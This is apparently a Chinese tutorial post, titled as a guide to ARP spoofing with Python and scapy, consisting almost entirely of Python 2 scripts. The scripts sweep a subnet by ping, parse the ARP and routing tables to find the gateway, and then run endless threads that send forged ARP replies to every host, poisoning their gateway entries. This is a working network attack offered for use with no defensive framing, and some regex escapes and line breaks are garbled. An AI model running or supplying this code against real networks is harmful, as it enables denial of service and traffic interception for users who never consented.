Python利用scapy实现ARP欺骗的方法

eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意，参数为字符串类型arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)#src为源，dst为目标，op=2为响应报文、1为请求pkt = eth / arpendp(pkt)

#!/usr/bin/python'''Using ping to scan'''import osimport reimport timeimport thread def host_scanner(ip):  p = os.popen('ping -c 2 '+ip)  string = p.read()  pattern = 'Destination Host Unreachable'  if re.search(pattern,string) is not None:    print '[*]From '+ip+':Destination Host Unreachable!'+time.asctime( time.localtime(time.time()) )    return False  else:    print '[-]From '+ip+':Recived 64 bytes!'+time.asctime( time.localtime(time.time()) )    return True if __name__=='__main__':  print 'This script is only use as model,function:scanner(ip)!'

#!/usr/bin/python'''Using re to get arp tablearp -a? (192.168.43.1) at c0:ee:fb:d1:cd:ce [ether] on wlp4s0'''import reimport osimport time def getMac(ip_table=[],arp_table={}):  #print '[-]Loading ARP table...'+time.asctime( time.localtime(time.time()) )  p = os.popen('arp -a')  string = p.read()  string = string.split('/n')  pattern = '(/d{1,3}./d{1,3}./d{1,3}./d{1,3})(./s*at/s*)([a-z0-9]{2}/:[a-z0-9]{2}/:[a-z0-9]{2}/:[a-z0-9]{2}/:[a-z0-9]{2}/:[a-z0-9]{2})'  length = len(string)  for i in range(length):    if string[i] == '':      continue    result = re.search(pattern, string[i])    if result is not None:      ip = result.group(1)      mac = result.group(3)      arp_table[ip]=mac      ip_table.append(ip)    #else:      #print '[*]macSearch.getMac:result is None'  #print '[-]ARP table ready!'+'<->'+time.asctime( time.localtime(time.time()) )  return (ip_table,arp_table) if __name__=='__main__':  table = getMac()  ip_table = table[0]  arp_table = table[1]  for i in range(len(ip_table)):    ip = ip_table[i]    print '[-]'+ip+'<-is located on->'+arp_table[ip]

#!/usr/bin/python''''Kernel IP routing table/nDestination   Gateway     Genmask     Flags Metric Ref  Use Iface/n0.0.0.0     172.16.0.254  0.0.0.0     UG  100  0    0 enp3s0f1/n172.16.0.0   0.0.0.0     255.255.255.0  U   100  0    0 enp3s0f1/n'''' import reimport osimport timefrom macSearch import * def find_Gateway():  p = os.popen('route -n')  route_table = p.read()  pattern = '(0/.0/.0/.0)(/s+)((/d+/.){1,3}(/d+))(/s+)(0/.0/.0/.0)'  result = re.search(pattern, route_table)  if result is not None:    #print '[-]Gateway is located on:' + result.group(3)+'...'+time.asctime( time.localtime(time.time()) )    table = getMac()    ip = table[0][0]    mac = table[1][ip]    return (ip,mac)  else:    #print '[*]arpATC.find_Gateway:result is None!'    #print '[*]Gateway is no found!'    return if __name__=='__main__':  print '[-]Looking for Gateway...'+time.asctime( time.localtime(time.time()) )  gateway = find_Gateway()  if gateway is not None:    print '[-]Gateway is located on:' + gateway[0]+'('+gateway[1]+')'+'...'+time.asctime( time.localtime(time.time()))  else:    print '[*]Gateway is no found!'+gateway[0]+time.asctime( time.localtime(time.time()) )

#/usr/bin/python import threadingimport timefrom gtwaySearch import *from macSearch import *from pingScaner import * class arpThread(threading.Thread):  def __init__(self,tag_ip,number):    super(arpThread,self).__init__()    self.tag_ip = tag_ip    self.number = number    self.status = False   def run(self):    add = 0    if (self.number-1)==0:      add = 1    start = (self.number-1)*64 + add    #1-63,64-127,128-191,192-256    end = start + 64    for i in range(start, end):      if i < 255:        host = self.tag_ip.split('.')        host[3] = str(i)        host = '.'.join(host)        host_scanner(host)    self.status=True    print '[-]Status of Thread_%d is '%self.number+str(self.status)     #print '[-]Scan completed!' + time.asctime(time.localtime(time.time())) 

#!/usr/bin/python import threadingfrom scapy.all import ARP,Ether,sendp,fuzz,send class atcThread(threading.Thread):  def __init__(self,table,gtw_ip,gtw_mac):    super(atcThread,self).__init__()    self.table = table    self.gtw_ip = gtw_ip    self.gtw_mac = gtw_mac   def run(self):    ip_table = self.table[0]    arp_table = self.table[1]    while True:      for i in range(len(ip_table)):        tag_ip = ip_table[i]        tag_mac = arp_table[tag_ip]        eth = Ether(src=self.gtw_mac, dst=tag_mac)        arp = ARP(hwsrc='01:02:03:04:05:06', psrc=self.gtw_ip, hwdst=tag_mac, pdst=tag_ip, op=2)        pkt = eth / arp        sendp(pkt)         #pkt = eth/fuzz(arp)        #send(pkt,loop=1)

#!/usr/bin/python''''''import osfrom gtwaySearch import *from arpThread import arpThreadfrom atcThread import atcThread def atc_WrongGTW(gtw):  src_ip = gtw[0]  src_mac = gtw[1]  print '[-]Start scanning hosts...' + time.asctime(time.localtime(time.time()))  arpThread_1 = arpThread(src_ip,1)  arpThread_2 = arpThread(src_ip,2)  arpThread_3 = arpThread(src_ip,3)  arpThread_4 = arpThread(src_ip,4)   arpThread_1.start()  arpThread_2.start()  arpThread_3.start()  arpThread_4.start()  t = False  while(t==False):    t = arpThread_1.status and arpThread_2.status and arpThread_3.status and arpThread_4.status    time.sleep(5)  table = getMac()  print '[-]Scan completed!' + time.asctime(time.localtime(time.time()))  flag = raw_input('[-]Ready to start attacking:(y/n)')  while(True):    if flag in ['y', 'Y', 'n', 'N']:      break    print "[*]Plz enter 'y' or 'n'!"    flag = raw_input()  if flag in ['n','N']:    print '[*]Script stopped!'  else:    atcThread_1 = atcThread(table,src_ip,src_mac)    atcThread_2 = atcThread(table,src_ip, src_mac)    atcThread_3 = atcThread(table,src_ip, src_mac)    atcThread_4 = atcThread(table,src_ip, src_mac)    os.popen('arp -s %s %s'%(src_ip,src_mac))    print '[-]'+'arp -s %s %s'%(src_ip,src_mac)    print '[-]Strat attack...'    atcThread_1.start()    atcThread_2.start()    atcThread_3.start()    atcThread_4.start()   if __name__=='__main__':  gateway = find_Gateway()  if gateway is not None:    atc_WrongGTW(gateway)    while True:      pass  else:    print "[*]Can't find Gateway!"